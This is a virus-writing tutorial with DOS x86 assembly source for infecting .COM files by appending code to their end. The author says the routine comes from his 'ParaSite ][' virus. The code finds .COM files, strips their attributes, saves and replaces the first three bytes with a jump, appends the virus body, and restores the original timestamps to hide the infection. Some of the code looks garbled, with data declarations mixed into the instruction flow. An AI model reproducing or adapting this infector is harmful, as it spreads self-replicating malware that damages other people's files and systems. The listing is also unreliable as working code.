Well I must state my opinion that there are certainly WAY too many
Overwriting Viruses out here. To help put a Stop to this I will try
to explain to you a SIMPLE way to infect COM files at the END of the
Program. This routine WORKS if you follow my steps correctly, and
I've already used this in my `ParaSite ][' Virus.
Anyhow, this is a brief description of what the ASM source will do.
1. Find a .COM file in the current Directory
2. Save the Date and File's Attribute.
3. Save the First 3 Bytes in a Stack
4. Infect the File & restore new 3 bytes..
5. Put the OLD date and File Attributes back on
Beginning...
~~~~~~~~~~~~
;----------------------------------------------------------------------
; The Simple routine to Search for a .COM File...
;----------------------------------------------------------------------
com_files db "*.com",0
mov ah,4eh ;point to a *.COM file...
mov dx,com_files
mov cx,3 ;Attributes with ReadOnly or Hidden
int 21h ;is A okay...
cmp ax,12h ;Any files found?
je exit ;If no Files found Exit...
jmp found_file
; Instead of Exiting here you can make the Virus go and change dir and
; look for several other .com files else where... with the help of the
; path or simply searching for more <dir>...
found_file:
mov di,[si+file] ;di points to the filename
push si
add si,file ;si points to filename...
mov ax,offset 4300h ;get file Attributes...
mov dx,si ;filename in dx..
int 21h
mov file_attrib,cx ;Save file Attributes.
file dw 0
; Here we'll set the file attributes to nothing
mov ax,offset 4301h ;To set file Attributes...
mov cx,offset 0fffeh ;Set them to a Normal File
mov dx,si ;filename...
int 21h
mov ax,offset 3d02h ;Open File to Read/Write.
mov dx,si ;ASCIIZ filename
int 21h
jnb ok ;If file was open continue
jmp put_old_attrib ; error happened restore old attribs
; and quit.
ok:
mov bx,ax
mov ax,offset 5700h ;Get File Date & Time...
int 21h
mov old_time,cx ;Save old File Time...
mov old_date,dx ;Save old File Date
old_time db 0
old_date db 0
; here we infect the file... but first we SAVE the first 3 bytes
; somewhere in our virus
mov ah,3fh ;Read file...
mov cx,3 ;Number of bytes to read
mov dx,first_3 ;Save bytes in the buffer
add dx,si ;Filename...
int 21h
cmp ax,3 ;Where 3 bytes read?
jnz fix_file ;If not fix file like before and quit
first_3 equ $ ; The First three bytes of the Original File!
int 20h ; the virus is infected to.
nop
; This moves the File pointer to the END of the file
mov ax,offset 4202h
mov cx,0
mov dx,0
int 21h
mov cx,ax ;DX:AX is the FILESIZE!
sub ax,3 ;subtract three because of file pointer
add cx,offset c_len_y
mov di,si
sub di,offset c_len_x
mov [di],cx ;Modifies the 2nd & 3rd bytes of program
; The writes our virus to the file
mov ah,40h
mov cx,virlength ;Virus Length
mov dx,si ;File...
sub dx,offset codelength ;Length of virus codes.
int 21h
cmp ax,offset virlength ;all bytes written?
jnz fix_file ;If no fix file and quit
;Moves the file pointer to the beginning of file and write the
;3 bytes JMP at the beginning of the file
mov ax,offset 4200h
mov cx,0
mov dx,0
int 21h
mov ah,40h ;Write to file...
mov cx,3 ;# of bytes to write...
mov dx,si ;File name...
add dx,jump ;Point to the new JMP statement
int 21h
jump db 0e9h ;This is the JMP that will be put in the
;Begining of the file!
;Restore Old File Time & Date
fix_file:
mov dx,old_date ;Old File Date
mov cx,old_time ;Old file Time...
and cx,offset 0ffe0h ;Flat Attribs.
mov ax,offset 5701h
int 21h
mov ah,3eh
int 21h ;Close file...